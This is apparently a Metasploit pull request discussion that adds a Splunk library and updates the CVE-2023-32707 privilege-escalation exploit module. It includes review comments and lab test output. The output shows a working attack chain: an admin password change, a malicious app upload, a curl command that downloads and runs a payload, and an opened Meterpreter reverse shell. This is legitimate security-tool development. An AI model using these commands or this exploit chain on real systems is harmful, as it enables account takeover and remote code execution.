Add Splunk library
rapid7/metasploit-framework pull request #18715
Opened 2024-01-18 17:48 UTC by errorxyz

Fixes #18643 
This PR adds a Splunk mixin with `splunk_login`, `splunk_upload_app`, `splunk_and_online?`, `splunk_version`, `splunk_is_auth_required?`, `splunk_default_creds` methods, mostly copy pasted from their references in the issue.

### TODO
- [ ] Update splunk_privilege_escalation_cve_2023_32707 to use the library

2024-01-25 15:11 UTC, cgranleese-r7 commented on lib/msf/core/exploit/remote/http/splunk/helpers.rb
> +    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies
Is this 8000 hardcoded to the current port number, if so do we need to handle the scenario when it isn't?

Note for the tester. Test this against another port.

2024-01-25 15:11 UTC, cgranleese-r7 commented on lib/msf/core/exploit/remote/http/splunk/login.rb
> +    return (res && res.body =~ /Logged in as (.+)/) ? false : true
```suggestion
   !(res && res.body =~ /Logged in as (.+)/)
```

2024-01-25 15:11 UTC, cgranleese-r7 commented on lib/msf/core/exploit/remote/http/splunk/version.rb
> +    }, 25)
```suggestion
    })
```

2024-01-25 15:11 UTC, cgranleese-r7 commented on lib/msf/core/exploit/remote/http/splunk/version.rb
> +    }, 25)
Removing just to leave the user with specify the timeout.

2024-01-26 13:17 UTC, errorxyz commented on lib/msf/core/exploit/remote/http/splunk/base.rb
> +  def splunk_and_online?
Why do we want to do fingerprinting here? Also, fingerprinting doesn't usually work without cookies set, so what would we return in that case?

2024-01-26 13:18 UTC, h00die commented on lib/msf/core/exploit/remote/http/splunk/base.rb
> +  def splunk_and_online?
This is a copy of the WordPress library implementation, shouldn't do fingerprint

2024-01-26 17:02 UTC, errorxyz commented on lib/msf/core/exploit/remote/http/splunk/helpers.rb
> +    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies
I changed `session_id_8000` to `session_id_8001` and it'd still login for splunk running on port `8000`, however it looks like it does refer to the port number as seen [here](https://github.com/rapid7/metasploit-framework/blob/2390058b375decd201edcbcd6b33db24f599a16f/modules/auxiliary/scanner/http/splunk_web_login.rb#L78), so I'll make it `session_id_#{datastore['RPORT']}`

2024-01-26 17:33 UTC, errorxyz commented
Sorry for all the force pushes, had some weird indentation issues. I've made all the reviewed changes and some more changes in the `splunk_login` method for logging purposes.

2024-02-20 17:27 UTC, jheysel-r7 commented
Hey @errorxyz. I noticed there were a couple references to `cookies_hash['splunkweb_csrf_token_8000']`. Do those references need to be changed to `cookies_hash['splunkweb_csrf_token_#{datastore['RPORT']}']` to match the pattern mentioned here: https://github.com/rapid7/metasploit-framework/pull/18715#discussion_r1467901333 ? 

Also when testing I was getting the following error and was wondering if you have seen this before/ know if the module should be sending the old password when attempting change the password:
```
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
``` 
The error seems to be caused by a 400 response with the message body:
```
{"messages":[{"type":"ERROR","text":"Missing old password."}]}
```

Full output here: 
<details>
<summary>Testing output</summary>
<p>

```

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /en-US/account/login HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 17:19:14 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 13515
Vary: Cookie
Connection: Keep-Alive
Set-Cookie: cval=930975352; Path=/en-US/account/, splunkweb_uid=9D2D5AAA-8044-4F43-9978-563BAF116323; Path=/en-US/account; Max-Age=157680000; Expires=Sun, 18 Feb 2029 17:19:14 GMT
X-UA-Compatible: IE=edge
X-Frame-Options: SAMEORIGIN
Server: Splunkd

<!doctype html>
<!--[if lt IE 7]> <html class="no-js ie  lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 lt-ie9"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9"> <![endif]-->
<!--[if gt IE 9]><!--> <html class="no-js"> <!--<![endif]-->
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title></title>
    <meta name="description" content="listen to your data" />
    <meta name="author" content="Splunk Inc." />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="referrer" content="origin" />
    <script type="text/json" id="splunkd-partials">
{"/services/session":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"hasLoggedIn":true,"cval":930975352,"time":1708449554,"lang":"en-US","bump":0,"splunkweb_uid":"9D2D5AAA-8044-4F43-9978-563BAF116323"}}],"generator":{}},"/services/server/info":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"instance_type":"download","product_type":"enterprise","staticAssetId":"A8C1DD7E0FAD5BDC3CE647995FAEE58A9A6DAD70F097341AC3A16E2705E962D1","isFree":false,"isTrial":true,"licenseState":"OK"}}],"generator":{}},"/configs/conf-web":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"enable_autocomplete_login":false,"updateCheckerBaseURL":"https://quickdraw.splunk.com/js/","login_content":"","root_endpoint":"","customFavicon":"","loginCustomLogo":"","loginBackgroundImageOption":"default","loginCustomBackgroundImage":"","loginFooterOption":"default","loginFooterText":"","loginDocumentTitleOption":"default","loginDocumentTitleText":"","firstTimeLoginMessageOption":"default","firstTimeLoginMessage":"","loginPasswordHint":"","minify_js":true,"minify_css":true}}],"generator":{}}}
    </script>
    <script>
        if(typeof JSON!=='object'){JSON={};}(function(){'use strict';function f(n){return n<10?'0'+n:n;}if(typeof Date.prototype.toJSON!=='function'){Date.prototype.toJSON=function(){return isFinite(this.valueOf())?this.getUTCFullYear()+'-'+f(this.getUTCMonth()+1)+'-'+f(this.getUTCDate())+'T'+f(this.getUTCHours())+':'+f(this.getUTCMinutes())+':'+f(this.getUTCSeconds())+'Z':null;};String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(){return this.valueOf();};}var cx,escapable,gap,indent,meta,rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'"'+string.replace(escapable,function(a){var c=meta[a];return typeof c==='string'?c:'\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);})+'"':'"'+string+'"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value==='object'&&typeof value.toJSON==='function'){value=value.toJSON(key);}if(typeof rep==='function'){value=rep.call(holder,key,value);}switch(typeof value){case'string':return quote(value);case'number':return isFinite(value)?String(value):'null';case'boolean':case'null':return String(value);case'object':if(!value){return'null';}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)==='[object Array]'){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null';}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v;}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){if(typeof rep[i]==='string'){k=rep[i];v=str(k,value);if(v){partial.push(quote(k)+(gap?': ':':')+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?': ':':')+v);}}}}v=partial.length===0?'{}':gap?'{\n'+gap+partial.join(',\n'+gap)+'\n'+mind+'}':'{'+partial.join(',')+'}';gap=mind;return v;}}if(typeof JSON.stringify!=='function'){escapable=/[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;meta={'\b':'\\b','\t':'\\t','\n':'\\n','\f':'\\f','\r':'\\r','"':'\\"','\\':'\\\\'};JSON.stringify=function(value,replacer,space){var i;gap='';indent='';if(typeof space==='number'){for(i=0;i<space;i+=1){indent+=' ';}}else if(typeof space==='string'){indent=space;}rep=replacer;if(replacer&&typeof replacer!=='function'&&(typeof replacer!=='object'||typeof replacer.length!=='number')){throw new Error('JSON.stringify');}return str('',{'':value});};}if(typeof JSON.parse!=='function'){cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value==='object'){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return'\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\],:{}\s]*$/.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,'@').replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,']').replace(/(?:^|:|,)(?:\s*\[)+/g,''))){j=eval('('+text+')');return typeof reviver==='function'?walk({'':j},''):j;}throw new SyntaxError('JSON.parse');};}}());        var __splunkd_partials__ = JSON.parse(document.getElementById('splunkd-partials').innerHTML);
        //HTML helpers
        var script = function(attributes) {
            var container = document.createElement('div'),
                content = document.createElement('script');
            content.setAttribute('type', 'text/template');
            for (var attribute in attributes) {
                if (attributes.hasOwnProperty(attribute) && attribute!=='text/javascript') {
                    if (attribute==='innerText') {
      [...]

2024-02-22 11:31 UTC, errorxyz commented
Thanks for pointing out the token mistake, I'll make the changes accordingly

I went through your testing output, and I noticed that you were using `admin:password` to login- so I think you've set `USERNAME` to `admin` and `PASSWORD` to `password` instead of setting `USERNAME` to `redway` and `PASSWORD` to `changeme`(if you've followed the link in the PR comment to setup). The `TARGET_USER` is supposed to be the username whose password we want to change(typically admin) and `USERNAME` is the user whose creds we already have access to(user with the special privs).

2024-03-04 14:40 UTC, smcintyre-r7 requested changes

2024-03-05 19:43 UTC, errorxyz commented on lib/msf/core/exploit/remote/http/splunk/login.rb
> +  def splunk_default_creds
i think you meant `splunk_login_with_default_creds`. I'll change this method to return the default creds and create another method `splunk_login_with_default_creds` that logs in using the default creds

2024-03-05 20:07 UTC, errorxyz commented on lib/msf/core/exploit/remote/http/splunk/helpers.rb
> +        error_msg = f'Error : {str(e)} '
Nice catch!

2024-03-05 21:17 UTC, smcintyre-r7 approved these changes
Change are looking good to me now. I was able to test that the updated exploit module is working as expected. I tried the default payload as well as `cmd/linux/http/x64/meterpreter/reverse_tcp`.

In both cases it worked. In the output below, you may notice Meterpreter is failing with error 2 but I'm confident that's unrelated since this changes no Meterpreter code.

```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Command to run on remote host: curl -so ./cVDoIUbawOYf http://192.168.159.128:8080/km47K8h77L_ZqYnoDxpGCA; chmod +x ./cVDoIUbawOYf; ./cVDoIUbawOYf &
[*] Fetch Handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /km47K8h77L_ZqYnoDxpGCA
[*] Started reverse TCP handler on 192.168.159.128:4455 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'redway' : 'changeme'
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to jHZMUwTymGy
[+] Password of the user 'admin' has been changed to jHZMUwTymGy
[+] SUCCESSFUL LOGIN. 'admin' : 'jHZMUwTymGy'
[*] Splunk app uploaded successfully
[*] Client 192.168.159.128 requested /km47K8h77L_ZqYnoDxpGCA
[*] Sending payload to 192.168.159.128 (curl/7.61.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Session ID 4 (192.168.159.128:4455 -> 192.168.159.128:46088) processing AutoRunScript 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
[*] Executing cd on #<Session:meterpreter 192.168.159.128:46088 (192.168.159.128) "splunk @ 10.0.2.100">...
[*] Response: 
[*] Meterpreter session 4 opened (192.168.159.128:4455 -> 192.168.159.128:46088) at 2024-03-05 16:11:59 -0500
[*] Cleaning up: destroying job 1709673118.9
[*] Cleaning up: removing app zaamdox

meterpreter > getuid
Server username: splunk
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > pwd
[-] stdapi_fs_getwd: Operation failed: 2
```

Thanks for taking this project on! I'll have this landed shortly.

2024-03-05 21:17 UTC, merged

2024-03-05 21:18 UTC, smcintyre-r7 commented
# Release Notes
This adds a Splunk library for use by future modules. It also updates the existing `exploit/multi/http/splunk_privilege_escalation_cve_2023_32707` module to use it.